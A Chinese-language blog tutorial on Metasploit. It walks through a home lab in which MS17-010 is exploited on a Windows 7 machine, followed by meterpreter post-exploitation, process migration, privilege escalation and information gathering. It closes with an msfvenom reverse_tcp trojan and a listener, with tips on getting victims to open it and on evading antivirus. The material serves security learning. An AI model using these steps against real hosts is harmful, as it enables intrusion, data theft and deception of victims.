Metasploit介绍
渗透测试人员神器,骇客hack站的武器,涵盖渗透测试流程所用的模块
模块介绍
- Auxiliary(辅助模块)
该模块不会直接在测试者和目标主机之间建立访问,他们只负责扫描、嗅探、指纹识别等相关功能以辅助渗透测试。 - Exploit(漏洞利用模块)
利用系统、应用或服务中的安全漏洞进行攻击的模块。该模块存在各种POC(验证漏洞是否存在)、用于破坏系统安全性的攻击代码、每个漏洞对应的攻击代码(EXP) - Payload(攻击载荷模块)
目标系统在被渗透攻击之后完成实际攻击功能的代码,用于在目标系统上运行任意命令或者执行特定代码,添加用户账号,上传或下载文件等操作 - Post(后期渗透模块)
取得目标系统远程控制器后,进行一系列的后渗透攻击动作,如获取敏感信息、实施跳板攻击等 - Encoders(编码工具模块)
负责木马免杀,以防止安全软件检测出来
渗透攻击步骤
- 扫描目标机系统,寻找可用漏洞
- 选择并配置一个漏洞利用模块(Exploit)
- 选择并配置一个攻击载荷模块(Payload)
- 选择一个编码技术,绕过杀软
- 渗透攻击
实战演练
实验环境
windows7 靶机 ip 192.168.159.132 kali2021攻击机 ip 192.168.159.157
接下来windows7等着被渗透就ok kali果断打开msf(建议以root身份打开)
新版kali就是漂亮,我的博客里有新版kali教程可以去看看
主机发现
从现在开始,如果目标有足够的安全防护能力,那么你的一举一动可能会被对方掌握得清清楚楚,如果渗透测试需要隐秘进行,每个步骤要足够小心才是,这篇文章不讲解隐秘方法
一开始先发现有什么主机在线
nmap -sn只进行主机发现,不进行端口扫描 发现了4个主机在线,其中一个虚拟网卡1,一个虚拟网卡8,一台kali,一台win7
- 方法二
msf的scanner/discovery
端口扫描
检测漏洞是否存在
很多网络服务是漏洞频发的高危对象,刚刚已经知道目标开启的服务,通过对服务信息进入更深入的挖掘,通常称为服务查点
- nmap扫描
- 这里网络换了一下,只要用–script vuln 扫就行
扫出一个ms17010漏洞 - 手动检测
看到主机开启了445端口,而这个端口也是SMB协议默认运行的端口,大多数攻击都是通过SMB服务做跳板进行MSRPC(ms远程过程调用)来对其他windows本地服务漏洞实施渗透攻击的
先查看smb版本 可以看到SMB版本和 操作系统的版本 接下来搜索smb的攻击模块,并使用其中之一进行渗透攻击。模块详细信息可以use之后,show info查看 这里使用最常用的一个ms17-010 他这里已经帮我们设置好默认payload–meterpreter了,kali版本低可能要自己set payload 设置好参数,运行,成功拿shell 查看当前权限,system最高权限
后渗透攻击:信息收集
必须知道的命令
- 查看当前用户
直接是system最高权限用户,不用再利用其他漏洞提权了
在Windows操作系统中 1.普通权限 默认情况下,系统为用户分了7个组管理员组(Administrators)、高权限用户组(Power Users)、普通用户组(Users)、备份操作组(Backup Operators)、文件复制组(Replicator)、来宾用户组(Guests),已认证用户组(Ahthenticated users) 其中备份操作组和文件复制组为维护系统而设置,平时不会被使用系统默认的分组是依照一定的管理凭据指派权限的,而不是胡乱产生,管理员组拥有大部分的计算机操作权限(并不是全部),能够随意修改删除所有文件和修改系统设置只有程序信任组(特殊权限)。普通用户组则被系统拴在了自己的地盘里,不能处理其他用户的文件和运行涉及管理的程序等。来宾用户组的文件操作权限和普通用户组一样,但是无法执行更多的程序。 2.特殊权限 除了上面提到的7个默认权限分组,系统还存在一些特殊权限成员,这些成员是为了特殊用途而设置 分别是:SYSTEM(系统)、Trustedinstaller(受信任程序)、Everyone(任何人)、CREATOR OWNER(创建者) 等 这些特殊成员不被任何内置用户组吸纳,属于完全独立出来的账户。真正拥有“完全访问权”的只有一个成员:SYSTEM。.
- session放在后台
- 查看会话
- 选择会话
- 获得系统的控制台shell
进程迁移
在刚获得shell的时候,该shell是非常脆弱的,一步小心就会被用户关闭,所以第一步要移动这个shell
- 查看meterpreter进程号
- 输入ps 查看全部进程,找到后门PID
- 把进程迁移到explorer.exe(2396),因为它是个稳定的进程
迁移成功 原来的PID会自动关闭,如果没有 kill PID
系统命令
- use post/windows/gather/enum_patches
复制代码
还有很多请读者自行了解
文件系统命令
网络命令
后渗透攻击:权限提升
- meterpreter的getsystem
具体原理看下面连接
https://docs.rapid7.com/metasploit/meterpreter-getsystem
wmic是一款命令行管理工具,详情去百度
它的漏洞编号ms16-032 设置参数session,首先查看普通权限的sessionid,这里是2
后渗透攻击:信息窃取
msf gather(信息搜集)路径下有很多强大的信息收集模块
- 获得目标主机最近进行的系统操作、访问文件和文档操作记录
dumplinks - 获知目标主机安装的软件,安全更新与漏洞补丁信息
制作木马并监听
生成木马,可以通过webshell上传到目的主机中,也可以通过社工让受害人点开 - msfvenom -p windows/meterpreter/reverse_tcp lhost=... lport=... -f exe -o 储存的位置
复制代码
监听木马,等待着受害人打开木马 - use exploit/multi/handler
- set payload windows/meterpreter/reverse_tcp
复制代码 |